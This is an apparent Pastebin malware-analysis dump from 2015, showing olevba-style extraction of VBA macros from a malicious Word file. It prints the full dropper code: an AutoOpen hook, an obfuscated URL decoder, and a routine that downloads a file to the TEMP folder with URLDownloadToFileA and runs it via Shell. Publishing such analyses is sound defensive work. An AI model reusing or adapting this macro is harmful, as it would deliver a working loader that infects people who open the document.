SHARE
TWEET

Malicious Word macro

dynamoo Feb 26th, 2015 320 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Flags       Filename                                                        
  2. ----------- -----------------------------------------------------------------
  3. OLE:MAS---- igm135809.doc
  4.  
  5. (Flags: OpX=OpenXML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  6.  
  7. ===============================================================================
  8. FILE: igm135809.doc
  9. Type: OLE
  10. -------------------------------------------------------------------------------
  11. VBA MACRO ThisDocument.cls
  12. in file: igm135809.doc - OLE stream: u'Macros/VBA/ThisDocument'
  13. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  14. Sub autoopen()
  15. jQ5
  16. End Sub
  17. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  18. ANALYSIS:
  19. +----------+----------+---------------------------------------+
  20. | Type     | Keyword  | Description                           |
  21. +----------+----------+---------------------------------------+
  22. | AutoExec | AutoOpen | Runs when the Word document is opened |
  23. +----------+----------+---------------------------------------+
  24. -------------------------------------------------------------------------------
  25. VBA MACRO Module1.bas
  26. in file: igm135809.doc - OLE stream: u'Macros/VBA/Module1'
  27. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  28.  
  29. Public Function ZBGUQzMmnNQjLfJi(MMzzbkwYsQ As String) As String
  30. GoTo QmoxUCfvciBJyeaaZe
  31. QmoxUCfvciBJyeaaZe:
  32. GoTo OtTFVZcTsVAkgUp
  33. OtTFVZcTsVAkgUp:
  34. GoTo kuddPCeAMbIaLPqebUnk
  35. kuddPCeAMbIaLPqebUnk:
  36. GoTo BHDPSh
  37. BHDPSh:
  38. For NZNKEQTrblrn = 1 To Len(MMzzbkwYsQ) Step 2
  39. GoTo YSwLeyRLBhqqpufYf
  40. YSwLeyRLBhqqpufYf:
  41. GoTo VmpskIYQAjlFinAKgthS
  42. VmpskIYQAjlFinAKgthS:
  43. GoTo PrZqcgGgsmEBYtRKGR
  44. PrZqcgGgsmEBYtRKGR:
  45. GoTo TGQojMOuOUcR
  46. TGQojMOuOUcR:
  47. GoTo HFKiovanmCFIAao
  48. HFKiovanmCFIAao:
  49. ZBGUQzMmnNQjLfJi = ZBGUQzMmnNQjLfJi & Mid(MMzzbkwYsQ, NZNKEQTrblrn, 1)
  50. GoTo BVyDQNwJjjKS
  51. BVyDQNwJjjKS:
  52. GoTo cGfwQxICUDbKUbQ
  53. cGfwQxICUDbKUbQ:
  54. GoTo OVYhEzdfLRlti
  55. OVYhEzdfLRlti:
  56. GoTo JIMyELdDCSILDcFk
  57. JIMyELdDCSILDcFk:
  58. GoTo EZOFTeMMzzbkwYsQvN
  59. EZOFTeMMzzbkwYsQvN:
  60. GoTo KEQTrblrnzPQmoxUC
  61. KEQTrblrnzPQmoxUC:
  62. Next
  63. GoTo iBJye
  64. iBJye:
  65. GoTo ZeOHO
  66. ZeOHO:
  67. GoTo FVZcTsVAkgUpgVkuddP
  68. FVZcTsVAkgUpgVkuddP:
  69. End Function
  70.  
  71. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  72. ANALYSIS:
  73. No suspicious keyword or IOC found.
  74. -------------------------------------------------------------------------------
  75. VBA MACRO Class1.cls
  76. in file: igm135809.doc - OLE stream: u'Macros/VBA/Class1'
  77. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  78. (empty macro)
  79. -------------------------------------------------------------------------------
  80. VBA MACRO dfsdfsdf.bas
  81. in file: igm135809.doc - OLE stream: u'Macros/VBA/dfsdfsdf'
  82. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  83. #If VBA7 Then
  84.     Private Declare PtrSafe Function GHJbkjJKG Lib "urlmon" Alias _
  85.     "URLDownloadToFileA" (ByVal fdgsdfFF As LongPtr, _
  86.     ByVal gfhgfhF As String, _
  87.     ByVal hjkhgFF As String, _
  88.     ByVal gfhfghF As Long, _
  89.     ByVal gfdgdf As LongPtr) As LongPtr
  90. #Else
  91.     Private Declare Function GHJbkjJKG Lib "urlmon" Alias _
  92.     "URLDownloadToFileA" (ByVal fdgsdfFF As Long, _
  93.     ByVal gfhgfhF As String, _
  94.     ByVal hjkhgFF As String, _
  95.     ByVal gfhfghF As Long, _
  96.     ByVal gfdgdf As Long) As Long
  97. #End If
  98. Public Function ZXVDwjtQQrzvB71() As Integer
  99. Dim wFLdECQJIjCco17, aclHuKhrZdvFz71, ZGHsTHAroMpPX33, fjJHrRdaoktmZ65 As String
  100. Dim fcBkLtHUPAViT23, mWaFlcfvpbGqs65, xjTEqCqYYumMA98, jHsPLZznaTPjl82 As Integer
  101. fcBkLtHUPAViT23 = 6394
  102. wFLdECQJIjCco17 = R
  103. mWaFlcfvpbGqs65 = Asc(wFLdECQJIjCco17)
  104. If fcBkLtHUPAViT23 > mWaFlcfvpbGqs65 Then
  105.     For xjTEqCqYYumMA98 = 1 To 54
  106.        jHsPLZznaTPjl82 = mWaFlcfvpbGqs65 + xjTEqCqYYumMA98
  107.     Next xjTEqCqYYumMA98
  108. jHsPLZznaTPjl82 = jHsPLZznaTPjl82 + fcBkLtHUPAViT23
  109. aclHuKhrZdvFz71 = CStr(jHsPLZznaTPjl82)
  110. ZGHsTHAroMpPX33 = Mid$(aclHuKhrZdvFz71, 1, 4)
  111. fjJHrRdaoktmZ65 = fjJHrRdaoktmZ65 & "25"
  112. ZXVDwjtQQrzvB71 = CInt(Mid$(fjJHrRdaoktmZ65, 2, 6))
  113. Else
  114. ZXVDwjtQQrzvB71 = 54 + 6394
  115. MsgBox ("dvuZGYOgDjMWl95")
  116. End Function
  117.  
  118.  
  119. Sub jQ5()
  120. mog4O4d49 ZBGUQzMmnNQjLfJi("hot}t€p.:\/R/'x*oimum6aF.1nneetf/cjlsP/]bki&nZ.Xewxdei"), Environ(ZBGUQzMmnNQjLfJi("T)M\P[")) & ZBGUQzMmnNQjLfJi("\zGfVlh\j(J_J7V3JtH^.…esxae|")
  121. End Sub
  122. Function mog4O4d49(Mh9_094suu As String, R4_t As String) As Boolean
  123. vJHKBJdfkgfg = GHJbkjJKG(0&, Mh9_094suu, R4_t, 0&, 0&)
  124. Dim j_W8
  125. j_W8 = Shell(R4_t, 1)
  126. End Function
  127.  
  128.  
  129.  
  130. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  131. ANALYSIS:
  132. +------------+--------------------+-----------------------------------------+
  133. | Type       | Keyword            | Description                             |
  134. +------------+--------------------+-----------------------------------------+
  135. | Suspicious | Lib                | May run code from a DLL                 |
  136. | Suspicious | Shell              | May run an executable file or a system  |
  137. |            |                    | command                                 |
  138. | Suspicious | Environ            | May read system environment variables   |
  139. | Suspicious | URLDownloadToFileA | May download files from the Internet    |
  140. +------------+--------------------+-----------------------------------------+
  141. -------------------------------------------------------------------------------
  142. VBA MACRO Module2.bas
  143. in file: igm135809.doc - OLE stream: u'Macros/VBA/Module2'
  144. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  145. (empty macro)
RAW Paste Data
Top